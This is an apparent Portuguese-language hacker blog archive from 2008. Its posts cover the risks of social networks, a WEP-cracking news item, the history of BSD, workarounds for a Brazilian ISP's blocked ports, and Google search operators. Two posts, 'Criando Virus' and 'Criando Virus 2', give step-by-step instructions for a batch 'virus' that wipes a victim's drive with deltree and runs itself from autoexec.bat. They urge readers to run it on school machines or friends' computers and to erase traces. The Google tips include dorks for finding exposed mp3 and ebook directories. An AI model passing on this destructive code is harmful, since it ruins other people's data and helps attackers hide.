Mostrando postagens com marcador Informações Uteis. Mostrar todas as postagens
Mostrando postagens com marcador Informações Uteis. Mostrar todas as postagens

sexta-feira, 16 de maio de 2008

Os perigos das redes sociais



A web é social. Chegou-se nessa conclusão com a explosão dos sites de redes sociais, que buscam formar comunidades virtuais e disponibilizar ao usuário um meio para se apresentar ao mundo. Se de um lado estes sites apenas exploram o lado mais social do meio de comunicação que é a Internet, do outro estão os riscos à privacidade e à segurança do internauta que fizer uso desses serviços.
No Brasil, o site mais visitado por internautas interessados em uma rede social é o Orkut, do Google. Nos Estados Unidos e em outros países de língua inglesa, o MySpace, da News Corp., é mais popular. Apesar de possuírem funcionalidades e recursos diferentes, esses dois sites (e outras dezenas que surgiram para tentar sugar um pouco dos usuários que procuram por uma rede social) possuem o mesmo objetivo.

Um pouco de história
Os ataques mais violentos ao Orkut começaram no início de 2006, talvez um pouco antes, mas foi só na metade daquele ano que eles se intensificaram. No início de abril de 2006, a matéria Bankers utilizam Orkut para se espalhar, publicada aqui noBT HACKER, comunicou a existência de mensagens maliciosas que circulavam pelo Orkut. As mensagens espalhavam vírus, mas ainda não se sabia se as mensagens eram enviadas automaticamente pelo vírus ou manualmente por criminosos que roubaram dados da conta de um internauta.
A resposta chegou no mês seguinte, em maio, quando uma praga digital automatizada atacou o Orkut. A agressividade com que a praga se espalhou deixava claro que os outros ataques de que se tinha conhecimento até aquele momento tinham sido feitos manualmente. Em matéria do dia 22 de maio, a BTHacker publicou uma ferramenta para remover a praga.
Em alguns dias, a ferramenta alcançou a marca de 300 mil downloads. Os próprios usuários do Orkut é que espalharam links pelas comunidades divulgando a ferramenta. Mais tarde, criminosos se aproveitaram da situação para enviar mensagens maliciosas que ofereciam a “ferramenta de remoção”, mas que na verdade distribuíam um vírus semelhante ao que a ferramenta verdadeira se encarregava de remover.
Porque atacar usuários de redes sociais
Sites de redes sociais dependem exclusivamente de conteúdo enviado por seus usuários. Qualquer tentativa de restringir ou dificultar o envio ou o acesso a informações pode resultar numa queda no número de recados, depoimentos ou discussões que acontecem dentro da rede. O site não deve testar a paciência dos usuários com verificações de legitimidade de cada ação que ele faz, pois isso pode diminuir o interesse do internauta em usá-lo.
A facilidade com que um humano ou ferramenta automatizada pode enviar mensagens aos sites de redes sociais é um claro incentivo para criminosos. É fácil poluir a rede com mensagens maliciosas para espalhar todo tipo de praga digital e o primeiro passo de evolução nesse sentido foi automatizar o ataque.
As pragas espalhadas pelo Orkut geralmente roubam senhas de banco, o que também demonstra um incentivo financeiro. É um mercado negro e, quanto mais dinheiro se ganha, mais se pode investir na evolução das técnicas de infecção e disseminação. Há uma necessidade constante de evolução para acompanhar melhorias em ferramentas de segurança e no conhecimento do usuário, que vai aprendendo a lidar com golpes mais antigos.
O número de sites que as pragas digitais monitoram também aumentou e com ele o número de possíveis vítimas. Não só de bancos, mas usuários de lojas online e de sites de companhias aéreas — que vendem passagens pela Internet — também são alvo do roubo de dados.
Ao utilizar a rede social, o criminoso recebe um grande bônus. Se um usuário está infectado, este enviará as mensagens que espalham a praga digital para as pessoas que estão em seu círculo de amigos. Isso significa que apenas pessoas que já o conhecem e confiam de alguma forma é que receberão a mensagem, aumentando as chances de a infecção ir adiante.
Abusando da confiança entre os usuários das redes sociais e das próprias redes e seus usuários, os vírus podem se espalhar facilmente, mesmo com táticas simples de engenharia social. Em outras palavras, ataca-se redes sociais porque é fácil e efetivo.

Fim da privacidade?
Ser alvo de um código malicioso automatizado é um problema, sem dúvida, mas muitos internautas participantes de redes sociais jogam fora o pouco que lhes resta da privacidade, já corroída no mundo globalizado.
Alguns empregadores perguntam pelo endereço do perfil do Orkut de candidatos. Os motivos variam, mas estar exposto em uma rede social já não é mais diferente e muitas crianças já querem ter seu perfil online para adicionar seus amigos e participar de comunidades.
O uso de nicks ou apelidos para se comunicar na Internet sempre foi a regra, porém as redes sociais fazem a conexão do internauta com o mundo real. As conseqüências dessa ligação estão apenas começando a aparecer, mas está ficando claro que a sociedade offline parece já esperar que qualquer pessoa tenha suas ações online expostas em um perfil de uma rede social.
Se as informações disponíveis online forem utilizadas cada vez mais para julgar uma pessoa no mundo real, pode ser que essas informações sejam transformadas ou alteradas para sempre apresentar um lado positivo de cada um, servindo como ferramenta de marketing pessoal.

Os perfis são também minas de ouro para criminosos, tanto reais como virtuais. Roubos e seqüestros podem ser facilitados. Ataques de engenharia social, isto é, enganação, também são facilitados quando se conhece a vítima de forma mais pessoal. A própria natureza da rede social exige que seus participantes informem preferências e dados pessoais para facilitar que outras pessoas de interesses semelhantes os encontrem.

Qualquer um ainda pode tirar proveito dos recursos de redes sociais preservando sua identidade e sua privacidade. O MySpace, por exemplo, permite que o perfil seja configurado como privado para que somente amigos possam ver as informações ali presentes. Isso diminui de forma significativa a exposição gerada pelo uso da rede social. Entretanto, o MySpace também tem seus problemas, tanto de privacidade como de segurança, e já foi alvo de códigos maliciosos e adwares várias vezes, porém, por não ser tão popular aqui no Brasil, não será discutido a fundo.
O importante é que cada usuário esteja consciente da exposição e avalie se ela é mesmo desejada e positiva. É preciso estar longe da ilusão de que existe algo protegendo os dados dentro da rede, tal como o requerimento de convite exigido por algumas delas. Qualquer um que realmente queira pode conseguir um sem dificuldade. No entanto, ele só poderá ver aquilo que cada um estiver disposto a mostrar e, se informações falsas encontrarem um lugar dominante nas redes sociais, pode ser que estas redes percam seu valor.

Crackers criam novo médoto que quebra Wi-Fi em 1 min








Nova pagina 1




Crackers desenvolveram uma nova técnica para quebrar a criptografia de uma
rede sem fio segura WEP de 104-bits em menos de um minuto. A vulnerabilidade em

redes
Wi-Fi que utilizam este padrão já era conhecida há cerca de um ano, só
que agora é necessário apenas um décimo do número de pacotes usado para explorar
a falha, tornando a invasão muito mais rápida.



Segundo o site The Register, a técnica provê 50% de chance de conseguir a chave
em cerca de 1 minuto rodando sob uma rede 802.11g em velocidade máxima e com a
captura de 40 mil pacotes. Dobrando o período de captura de pacotes necessários
para a análise e quebra da proteção, a chance aumenta para 95%.



Os pesquisadores Erik Tews, Ralf-Philipp Weinmann e Andrei Pyshkin, da
Universidade Técnica de Darmstadt, na Alemanha, explicaram que após a captura
dos pacotes, em apenas três segundos de processamento em um computador padrão é
possível revelar a chave.



Conforme ataques anteriores, a quebra do código é feita na exploração de falhas
na criptografia RC4, conhecida desde 2001. Há seis anos matemáticos mostraram a
ineficiência do protocolo, mas o ataque era trabalhoso e requeria a
interceptação de 4 milhões de pacotes de

dados
para que a chave fosse descoberta, conforme noticiou o site PC World.



Como recomendação está o uso de uma rede com padrão de criptografia WPA, que é
mais resistente aos ataques, embora utilizado com menos freqüência do que o
popular padrão WEP.



Outros métodos incluem uso de um

sistema
de detecção de intrusão no sistema (IDS), que revelaria as inúmeras
tentativas de obtenção de pacotes através de requisições ARP; ou confundir os
hackers escondendo a chave real em meio a inúmeras outras inválidas.



O estudo completo pode ser acessado em PDF através do atalho:




http://dtmurl.com/a2u


 








Agradecimento

Bom pessoal eu queria agradecer a todos pela frequencia de vcs aqui no nosso site
espero q vcs gostem das nossas postagens e quero pedir tbm q vcs possam estar entrando em contato conosco pois queremos saber ti vcs oq vcs querem ver no site e etc... como pro exemplo duvidas i etc... si vcs tiverem duvidas podem entrar em contato conosco ow comigo
meu endereço é:wesley_capoeira14_@hotmail.com ow o nosso e-mail burlatudo@hotmail.com

Obrigado pela atenção di vcs e um otimo final de semana
By:TPC HACKER

quinta-feira, 15 de maio de 2008

Oque é um BSD e Oque é um UNIX de verdade

Quantas e quantas vezes vc ja ouviu falar de BSD
As vezes vc nem sabe oque é isso néh rs
mais hj aqui no BT Hacker vc ira conhecer realmente oque é isso!!!



BSD significa Distribuição do Sistema de Berkeley. É o nome da distribuição de códigos fonte proveniente da Universidade da Califórnia, Berkeley, as quais foram originalmente extensões para o sistema operacional UNIX do departamento de Pesquisas da AT&T. Vários projetos de sistemas operacionais de código aberto são baseados em uma distribuição desse código fonte, conhecido como 4.4BSD-Lite. Em adição, tais sistemas constituem-se de várias porções de outros projetos de Código Aberto, incluindo o notável projeto GNU. A constituição total do sistema operacional inclui:

O kernel BSD, que cuida do agendamento de processos, gerenciamento de memória, multi-processamento simétrico (SMP), dispositivos de controle, etc.

Ao contrário do kernel do Linux, existem vários kernels distintos de sistemas BSD com diferentes características e recursos.

A biblioteca C, a API base do sistema.

A biblioteca C do BSD é baseada em código proveniente de Berkeley, e não do projeto GNU.

Programas utilitários como shells, utilitários de manuseio de arquivos, compiladores, linkadores.

Alguns desses programas são derivados do projeto GNU, outros não.

O sistema X Window, que provê uma interface gráfica.

O sistema X Window usado na maioria das versões do BSD é mantido por um projeto separado, o Projeto XFree86. Trata-se do mesmo código usado por sistemas Linux. O BSD normalmente não especifica nenhum desktop gráfico como o GNOME ou o KDE,contudo, tais ambientes estão sempre disponíveis.

Muitos outros programas e utilitárioss.


2°Oque é um UNIX de verdade?

Os sistemas operacionais BSD não são clones, mas sim, código livre derivado diretamente do sistema operacional UNIX da AT&T, que também é o ancestral dos modernos UNIX System V. Talvez isso lhe surpreenda. Como pode ser isso, se a AT&T nunca disponibilizou seus fontes como código aberto?

É verdade que o UNIX da AT&T não é Open Source, e do ponto de vista da licença de direitos legais, o BSD definitivamente não é UNIX, mas por outro lado, a AT&T importou muito código de outros projetos, especialmente do Grupo de Pesquisas de Ciências Computacionais da Universidade da Califórnia, em Berkeley, CA. Desde 1976 o CSRG lançava fitas magnéticas com cópias de seu software, o qual era chamado de Distribuição do Software de Berkeley ou BSD.

As versões iniciais do BSD consistiam-se fundamentalmente de programas à nível de usuário, mas essa realidade mudou dramaticamente assim que o CSRG fechou um contrato com a Agência de Pesquisas e Projetos de Avançados de Defesa (a DARPA) para atualizar os protocolos de comunicação que eram usados em sua rede, a ARPANET. Os novos protocolos passaram a ser conhecidos como Protocolos de Internet, e mais tarde como TCP/IP se tornando os mais importantes protocolos de todos os tempos. A primeira implementação amplamente distribuída desses protocolos eram parte do 4.2BSD, em 1982.

Ao longo da década de 80, várias empresas que produziam estações de trabalho começaram a se espalhar. Muitas delas preferiam licenciar o UNIX ao invés de desenvolverem sistemas operacionais por si mesmas. A Sun Microsystems em particular, licenciou o UNIX e implementou uma versão do 4.2BSD, a qual eles chamaram de SunOS. Quando a AT&T se deu permissão para vender o UNIX comercialmente, começaram a desenvolver uma implementação ``na unha'' chamada de System III, que seria rapidamente sucedida pelo System V. A base do código do System V não incluia o suporte a networking, então todas as implementações passaram a incluir software adicional do BSD, incluindo o TCP/IP, e também programas utilitários como o interpretador de linha de comandos csh e o editor vi. Em sua coletividade, estas aprimorações foram conhecidas como Extensões de Berkeley.

As fitas magnéticas do BSD continham código fonte da AT&T e por isso precisavam de uma licença de fontes do UNIX. Por volta de 1990, os fundos do CSRG estavam acabando. Alguns membros do grupo decidiram lançar o código BSD, que era Open Source, sem o código proprietário da AT&T. Finalmente isso aconteceu com o Networking Tape 2, normalmente conhecido como Net/2. O Net/2 não era um sistema operacional completo: aproximadamente 20% do código do kernel estava faltando. Um dos membros do CSRG, William F. Jolitz, escreveu o código que faltava e o lançou em 1992, como o 386BSD. Ao mesmo tempo, um outro grupo de membros do extinto CSRG formou uma empresa comercial chamada de Berkeley Software Design Inc. e lançou uma versão beta de seu sistema operacional, chamada de BSD/386, baseado nos mesmos fontes. Depois o nome do sistema operacional mudou para BSD/OS.

O 386BSD nunca se tornou um sistema operacional estável. Ao invés disso, outros dois projetos nasceram à partir dele, em 1993: O NetBSD e o FreeBSD. Originalmente os dois projetos divergiram devido à diferenças quanto à paciência na espera de novas melhorias no 386BSD: o pessoal do NetBSD começou o projeto no início do ano, e a primeira versão do FreeBSD não ficou pronta até o final do ano. No meio tempo, a base do código se modificou o suficiente para tornar difícil uma união. Em adição, os projetos tinham objetivos diferentes, como veremos a seguir. Em 1996, um projeto posterior, o OpenBSD, originou-se à partir do NetBSD.

3°Por quê BSD não é mais conhecido?

Por algumas razões, o BSD é relativamente desconhecido:

Os desenvolvedores do BSD estão frequentemente mais interessados em aprimorar seu código do que fazer propaganda dele.

A maior parte da popularidade do Linux se deve a fatores externos ao projeto Linux, como a imprensa, e companias criadas para oferecer serviços em Linux. Até recentemente, os BSDs open source não contavam com tais proponentes.

Os desenvolvedores BSD tendem a ser mais experientes do que desenvolvedores Linux, e tem menos interesse em tornar o sistema fácil de utilizar. Novatos tendem a se sentir mais confortáveis com Linux.

Em 1992, a AT&T processou a BSDI, vendedora do BSD/386, alegando que o produto continha código proprietário da AT&T. O caso foi resolvido na corte, em 1994, mas os aspectos da litiginação continuam perseguindo as pessoas. Em Março de 2000 um artigo publicado na rede afirmou que o caso havia sido resolvido recentemente.

Um detalhe que o processo judicial carificou foi sobre a denominação: nos anos 80, os BSD eram conhecidos como BSD UNIX. Com a eliminação do último vestígio de código da AT&T no BSD, ele também perdeu o direito de ser chamado de UNIX. Contudo ainda podem ser vistas referências em títulos de livros como the 4.3BSD UNIX operating system e the 4.4BSD operating system.

Existe uma idéia que os projetos BSD sejam fragmentados e beligerantes. O Wall Street Journal falou de balkanização nos projetos BSD. Assim como o processo judicial, essas idéias se baseiam fundamentalmente em história antiga.

As Limitações do Speedy


O acesso via ADSL, oferecido pela Telefônica como Speedy, tem várias vantagens sobre ultrapassado acesso discado: é mais rápido, oferece conexão ininterrupta pagando-se apenas uma taxa mensal fixa, etc. etc. etc. Mas como nada é perfeito, o serviço também tem suas limitações, o objetivo deste artigo é justamente falar um pouco sobre elas, explicar o por que de cada uma e, por que não, ensinar como burlar algumas delas.



Conexão Instável

A maior reclamação dos usuários do Speedy vem sendo a instabilidade da conexão, que em muitos casos cai constantemente, obrigando a resetar o modem para que a conexão volte. Em alguns casos as quedas são esporádicas e não chegam a incomodar, mas existem casos em que a linha cai freqüentemente, de poucos em poucos minutos.

O grande problema neste caso é o trecho de fio entre a casa do assinante a central telefônica. No acesso via ADSL, temos dois modems ADSL, um na central e outro na casa do usuário, que mantém uma conexão contínua usando o cabo telefônico. O grande problema é que em muitos casos o cabo está deteriorado, e apesar de não oferecer problemas com as ligações de voz, compromete a velocidade da comunicação entre os modems e pode fazer com que a conexão caia com freqüência, devido à instabilidade do sinal.

Como resolver este problema? Normalmente existem vários cabos disponíveis em cada central, cabos sobressalentes já puxados, que podem ser usados em substituição de outro defeituoso. Existem também derivações nos cabos, que podem ser eliminadas para melhorar o sinal. Caso você esteja com o problema de desconexão, ligue para o 103 e peça a visita de um técnico da telefônica. Como neste caso o problema é com as instalações da Telefônica a visita não será cobrada. O técnico possui um aparelho que testa a velocidade da conexão com o modem da central, em geral eles consideram a linha como defeituosa caso a conexão esteja abaixo de 2 Mbps (isso não tem nada a ver com a sua velocidade de conexão, é a velocidade máxima que pode ser alcançada). Percebendo o defeito o técnico tentará justamente trocar o par de fios entre sua casa e a central, tirar derivações, etc. Nem sempre eles conseguem resolver o problema, mas pelo menos tentam. E qualquer forma, você pode acionar o serviço várias vezes até que consigam resolver o problema.



Portas bloqueadas

Outra limitação são as portas TCP bloqueadas pela Telefônica, que impedem "conexões entrantes", ou seja, tentam impedir que você monte um servidor de FTP ou transforme seu micro num servidor Web por exemplo. As portas bloqueadas são:

Porta 21, usada por servidores de FTP,

Porta 23, usada para acesso via Telnet

Porta 25, usada por servidores SMTP (servidor de e-mail)

Porta 80, usada para acesso via http, ou seja por servidores de páginas Web.

Portas 137 e 138: Compartilhamento de arquivos e impressoras (serve mais como uma medida de segurança para os usuários, já que muita gente acaba esquecendo o compartilhamento ativado, expondo-se a invasões).

Porta 1352: Usada para administração remota do Lotus notes.

Portas 1503 e 1720: Estas portas são usadas pelo NetMeeting para receber as chamadas. Com as portas bloqueadas, você pode chamar alguém para conversar, mas ninguém conseguirá chamá-lo.

Porta 5631: é usada para administração remota usando o PC Anywhere.

No caso dos servidores de FTP e Http é fácil burlar a limitação. Ao configurar seu servidor de FTP, mude a porta default (a 21 bloqueada) para outra porta qualquer, a 22 por exemplo. No caso do servidor de Http, novamente configure o programa para usar outra porta e não a 80 default, você pode usar por exemplo a 1080. Ao acessar a página, ao invés de digitar http://seuIP, digite http://seuIP:1080, isso orientará o navegador a acessar o servidor usando a porta 1080 ao invés da porta default, novamente burlando a limitação.

Existe também uma versão do Speedy destinada a empresas, o Speedy Business, onde estas portas estão desbloqueadas. O Business custa 20 reais a mais por mês.



Clonagem de endereços IP

Outro problema grave e que vem se tornando freqüente é a clonagem de endereços IP. No Speedy cada usuário ganha um IP fixo que é dado pelo provedor de acesso. O grande problema é que não existe nenhum tipo de autenticação por senha ou por qualquer meio. Qualquer um que tenha o Speedy instalado pode usar qualquer IP da sua área, tendo apenas o trabalho de mudar o endereço nas configurações de rede. Dois micros não podem acessar usando o mesmo endereço IP, por isso caso um dos engraçadinhos resolva usar o mesmo endereço que você, novamente a sua conexão vai cair sempre que ele ativar a rede. Neste caso, a conexão não vai voltar resetando o modem, mas apenas desativando e reativando a conexão de rede no Windows, ou então resetando o micro.

A solução é ligar para o provedor, explicar o que está acontecendo e pedir que troquem seu endereço IP. Eles tem como rastrear quem clonou o primeiro endereço e tomar providências.



Compartilhamento da conexão

Usando o Speedy você tem apenas um endereço IP, mas claro, isto não significa que você não possa compartilhar a conexão usando o Internet Conection Sharing, ou então um servidor proxy qualquer, assim como faria para compartilhar uma conexão via modem.

Neste caso, o micro onde o modem ADSL está instalado deve ter duas placas de rede, uma para o modem e outra para a rede interna, por onde se comunicará com os demais micros. A desvantagem neste caso é que o micro principal terá que ficar ligado 24h, caso contrário os demais perderão o acesso quando ele for desligado.

Mas, uma surpresa é que dependendo do modelo de modem que está sendo usado, você pode usar o próprio modem ADSL para compartilhar a conexão, usando o NAT, ou até mesmo via DHCP. Se você estiver usando um modem Alcatel Speedy Touch Pro por exemplo, experimente mudar o seu endereço IP nas configurações de rede para "10.0.0.139", reinicie o micro, ative a conexão, abra o navegado e digite o endereço http://10.0.0.138. Você acaba de abrir a página de configuração do modem :-)

Este modelo de modem em especial é extremamente poderoso, pode servir até mesmo como um servidor DHCP, você pode pesquisar os recursos consultando o manual, que pode ser baixado em http://velocidade_justa.vila.bol.com.br/manuais.htm

Outra opção é comprar um Hub, ligar os micros em rede usando o hub, e ligar o modem a ele, usando a porta "Up-Link", a porta que normalmente é usada para conectar um hub ao outro. Não se esqueça de usar um cabo cross-over.

Você pode fazer várias assinaturas do provedor de acesso, ganhando assim um IP para cada micro que irá se conectar. A surpresa é que usando este sistema, todos os micros poderão conectar-se ao mesmo tempo, cada um com seu endereço IP, usando apenas UM modem e uma linha.

A velocidade de conexão normalmente vai ficar limitada a cerca de 2 Mbps, que é a velocidade média de comunicação do modem ADSL, de qualquer forma, já é suficiente para pelo menos 8 conexão de 256kb.

domingo, 11 de maio de 2008

Modo de Criação de Virus



Criando Virus







Em primeiro lugar, você deve abrir o MS-DOS e seguir o proximos passos....Digit: Edit(nome do seu arquivo).bat, deverá aparecer uma tela azul.Entre com os comandos: @ECHO OFF e BREAK OFF.A página deverá ficar da seguinte maneira



@ECHO OFF
BREAK OFF



Depois disso, a pessoa escolhe o que seu vírus deve fazer.Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá certeza de estar executando seu vírus ao iniciar o computador-alvo.Agora vamos supor que o seu vírus seja capaz de apagar todos arquivos do PC alheio.Você deve usar o seguinte comando:



deltree/y c:\*.*



Agora, o vírus simples da pessoa está completo.É só a vítima (seu amiguinho) executar o arquivo e pronto!!!



Importante:



Caso a pessoa passe esse vírus via disquete, ele não deve esquecer de finalizar o arquivo com o comando deltree/y a:\*.* .Isso serve para não deixar vestígios de seu ato insano.

Criando Virus 2



Para fazer um virus existem muitas plataformas e varios tipos de virus existe virus tipo *.bat*.exe*.mid*.sis*.dll*.etc....tem todas as formas que você possa imaginar para criar um virus do tipo melissa ou I love you não basta 5 minutos e semanas ou até mesmo meses para adicionar suas configurações e o que ele ira causar as vitimas como se espalhar pelo computador ou se camuflar em outros executaveis ou até mesmo no momento se espalhar por toda sua lista de contatos e enviar varias copias dele mesmo para e-mails de amigos e qualquer pessoa que estiver na sua lista de contato.Os virus mais fracos os chamados *.bat ou mais conhecidos como virus batch são criados em minutos basta ter a formula isso você encontra você pega uma formula seja de um virus pra excluir o windows ou para enviar erros ao modem tanto faz sempre quando você mesmo criar uj batch nunca eu falei NUNCA rode ele no seu proprio HD para ver se funciona ou não prefira sempre os micros da escola ou mande para algum lamer (ou como preferir LAMER ou COBRA).Quer editar seu virus*.bat agora?então vamos lá clique no menu iniciar vá até programas em seguida aponte para acessórios e abra o arquivo NotePad ou WordPad lá você digita isso exatamente como esta aqui:


@ECHO OFF
BREAK OFF
deltree/C: Y\*.*



A: nome do virus.bat autoexec.bat
Em seguida salve esse arquivo assim: Nome do virus.bat
Pronto agora você tem um virus.bat no seu proprio micro nossa!!!!que emoção não sei se vou conseguir digitar mais(chega de brincadeira) Agora de maneira nenhuma mesmo se desconfiar que esse virus está errado não abra esse arquivo então é só isso você agora já tem mais ou menos uma noção do que é um virus.bat e um .exe

Você sabe o que são Vírus?






Neste post vamos abordar um dos mais famosos malwares, os vírus



Neste post vamos abordar um dos mais famosos malwares, os vírus: você sem
dúvida já ouviu falar deles, mas será que todos sabemos
como eles funcionam e como podemos evitar que nossos computadores sejam infectados?



Os vírus de computador recebem este nome devido a sua semelhança
com os vírus biológicos. Da mesma maneira que um vírus
biológico entra em um organismo e o infecta, multiplicando-se e posteriormente
espalhando-se, um vírus de computador tem por finalidade invadir um
computador a fim de deixá-lo “doente”. Os principais danos
causados à maquina são: redução do desempenho,
perda de dados, acesso invasivo a informações pessoais e desconfiguração
do sistema operacional em casos mais sérios.



Outra característica intrínseca aos vírus é a
necessidade de um hospedeiro. Os hospedeiros mais comuns são os arquivos
executáveis, que acabam se propagando por anexos em emails, mensageiros
instantâneos e web sites. Para que um vírus se instale no seu
computador é necessário que você abra o arquivo executável
no qual ele está hospedado ou abra o anexo de email infectado, entretanto,
se o aplicativo for bem elaborado, poderá se instalar sem que você perceba.



A fim de proteger seu computador dos tão temidos vírus, você precisa
estar sempre atento aos sites que visita e principalmente aos arquivos que
baixa. Preocupado com a sua segurança, o Baixaki adotou o princípio
de testar todos os programas adicionados ao site, para evitar que nossos usuários
sejam contaminados. Entretanto, a maioria dos sites não têm esse
cuidado, disponibilizando muitas vezes conteúdo perigoso.



Os programas antivírus são essenciais para quem precisa limpar
computadores possivelmente infectados, mas também para quem quer estar
seguro. Principalmente aqueles que possuem informações importantes
ou utilizam serviços de banco pelo computador não podem se descuidar,
abrindo brechas para este tipo de ameaça.


sábado, 26 de abril de 2008

USANDO O GOOGLE

DICAS DE COMO UTILIZAR BEM MELHOR
O GOOGLE



Pessoal fiz um juntado de algumas

dicas
da internet sobre como pesquisar no google, afinal tem que saber
pertuntar neh...rs

espero que gostem quando eu achar mais coisas interessantes sobre a

busca
no google eu posto...

vlw



Wildcard: caractere curinga

Utilizado para encontrar pedaços de texto que não recorda, ou mesmo uma música,
nome de site na internet. Use o asterisco (*) para especificar qualquer coisa
entre as palavras.

Exemplos:

mundo * tribos

h* potter

_________________________________________________________________________



Definições

Essa eu particularmente gosto bastante, não sabe o que significa alguma coisa?
utilize define:oquerosaber para aprender mais uma com o oráculo.

Exemplo:

define:iphone // vejam soh essa define:mulheres

_________________________________________________________________________



Número intermediário

Retorna valores especificados entre o valor inicial e final. Utilize dois pontos
(”..”) entre um número e outro, e o Google vai trazer apenas resultados que
tenham números dentro do intervalo que você definiu

Exemplo:

oscar 2005..2007

Retorna páginas com contéudo faladno do Oscar entre os anso de 2005 e 2007

_________________________________________________________________________



Site específico


Busca por alguma termo dentro do site, a maioria dos sites oferece busca
interna, mais para aqueles que não possuem utilize o comando “site:” junto do
domínio onde você deseja buscar

Exemplo:

site:mundodastribos.com

_________________________________________________________________________



Filmes, Músicas

O Google tem a possibilidade de realizar buscas especificas por filmes, músicas.


Exemplos:

movie:harry poter

music:the tears of the dragon



Encontre determinados tipos de arquivos


Este também é um dos meus preferidos, utilize o comando “filetype:” acompanhado
da extensão que deseja encontrar, documentos em PDF, documentos do Word,
planilhas do Excel são algumas das extensões suportados pelo Google.

Exemplos:

curriculo filetype:doc

investimentos filetype:xls

_________________________________________________________________________

Informações sobre o endereço

Este recurso é um dos mais completos do Google, pois ele retorna todas as
informações indexadas pelo sistema, como o histórico da página, páginas
semelhantes, etc.



Exemplo:

info:www.converse.org.Br

Alem do link para a página ainda aparecem os seguintes resultados:

O Google pode mostrar as seguintes informações para este URL:

• Mostrar o cache do Google de

http://www.converse.org.br


• Encontrar páginas na Web que sejam semelhantes a

http://www.converse.org.br


• Encontrar páginas na Web que tenham um link para

http://www.converse.org.br


• Localizar páginas do site

http://www.converse.org.br


• Encontrar páginas na Web que contenham o termo "www.converse.org.br"

________________________________________________________________________________________


Busca por título de página

O intitle procura os títulos das páginas da internet, aqueles que aparecem junto
ao navegador.



Exemplo:

intitle:"Cultura Digital"

No resultado aparecem às páginas cujo título contém a expressão “Cultura
Digital”

_________________________________________________________________________



Pesquisa na URL


A URL é o endereço da página, tipo
http://www.convers/ê.org.br
ou

http://www.cultura.gov.br
. A busca na URL procura a palavra no
endereço da página.

Exemplo:

inurl:cultura



O resultado trás endereços de páginas (.com.br, .gov.Br, etc) que contenham a
palavra cultura.





Pesquisa no texto

Utilizando-se da sintaxe intext: é possível fazer uma pesquisa no conteúdo
textual, ou seja, ignorando links, URLs e títulos das páginas.



Exemplo:

intext:“cultura digital”



O resultado apresenta textos, artigos e páginas da internet que falam de cultura
digital.

_________________________________________________________________________

Busca interna

Também é possível dizer ao google que você deseja procural algo dentro de um
site específico. Por exemplo, procurar artigos sobre cultura digital publicados
no midiaindependente.org.

Exemplo:

"Cultura Digital" site:midiaindependente.org

_________________________________________________________________________

Quem linka para esta página

Para saber quais páginas fazem ligações com outras existe o recurso link:, que é
muito utilizado para saber quem linka sua página. Este recurso dispensa o uso do
http://

Exemplo:

link: estudiolivre.org

_________________________________________________________________________Busca
pelo passado: Cache


Em toda busca do Google há um link que diz cachê, ele é nada mais que uma cópia
da página que o sistema indexou. Essa é uma ótima opção para encontrar links que
sumiram, ou páginas que foram modificadas. Além do link retornado na busca
tradicional você também pdoe utilizar o recurso da seguinte forma:

Exemplo:

cache:www.converse.org.br

_________________________________________________________________________Páginas
relacionadas


Este recurso é ótimo para encontrar categorias de páginas. Por exemplo, páginas
que falem do Ministério da Cultura;

Exemplo:

related:www.cultura.gov.Br

Achar mp3

Busca os mp3 que estão inadvertidamentes soltos nos servidores por aí.

Exemplo:



-inurl:htm -inurl:html intitle:"index of" "Last modified" mp3

-inurl:htm -inurl:html intitle:"index of" "Last modified" mp3 "Prodigy"

_________________________________________________________________________

Free e-books -inurl:htm -inurl:html
intitle:"index of" +("/ebooks""/book")+(chmpdfzip)

-inurl:htm -inurl:html intitle:"index of" +("/ebooks""/book")